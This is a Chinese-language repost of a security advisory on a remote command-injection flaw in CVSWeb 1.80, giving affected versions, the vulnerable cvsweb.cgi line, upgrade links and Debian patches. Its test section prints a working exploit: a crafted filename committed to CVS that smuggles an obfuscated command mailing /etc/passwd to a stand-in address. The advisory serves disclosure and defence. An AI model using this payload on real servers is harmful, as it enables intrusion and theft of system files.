CVSWeb遠程攻擊漏洞精簡版
此文章主要講述的是CVSWeb遠程攻擊漏洞,我前兩天在相關網站看見CVSWeb遠程攻擊漏洞的資料,覺得挺好,就拿出來供大家分享,以下就是文章的詳細內容介紹,希望會給你帶來一些幫助在此方面。
受影響系統:
CVSWeb Developer CVSWeb 1.80
不受影響系統:
CVSWeb Developer CVSWeb 1.89
CVSWeb Developer CVSWeb 1.86
描述:
Cvsweb 1.80包含一個安全遠程攻擊漏洞,如果攻擊者對cvs庫有寫權限,他就可以遠程獲得對cvs server的
shell訪問權限。出問題的代碼在cvsweb.cgi中:
open($fh, "rlog '$filenames' 2>/dev/null |")
攻擊者通過建立一個特殊的文件名,來發動攻擊。
<* 來源: Wizdumb *>
測試方法:
警 告
以下程序(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負!
攻擊者會首先按照下列步驟操作:
SHELLCODE="';perl -e '\$_=q{mail foo#bar.baz < !etc!passwd}; y:!#:\x2F\x40:; system \$_';'"
touch $SHELLCODE
cvs add $SHELLCODE
cvs commit -m '' $SHELLCODE
然后攻擊者會訪問cvsweb頁面,瀏覽他設置木馬文件的目錄。這將導致/etc/passwd 文件被
發送給攻擊者,當然攻擊者也可以執行其他的命令。
建議:
升級到1.86或者更高版本,下載地址:
http://stud.fh-heilbronn.de/~zeller/cgi/cvsweb.cgi/
[ Debian Linux ]
Debian GNU/Linux 2.1 alias slink
源碼包:
http://security.debian.org/dists/stable/updates/source/cvsweb_109.dsc
MD5 checksum: b1810728310882fb72078674521ee369
http://security.debian.org/dists/stable/updates/source/cvsweb_109.tar.gz
MD5 checksum: 4c42ec3ba7248fc2499cdfaa6ae6b702
以上的相關內容就是對CVSWeb遠程攻擊漏洞的介紹,望你能有所收獲。
【編輯推薦】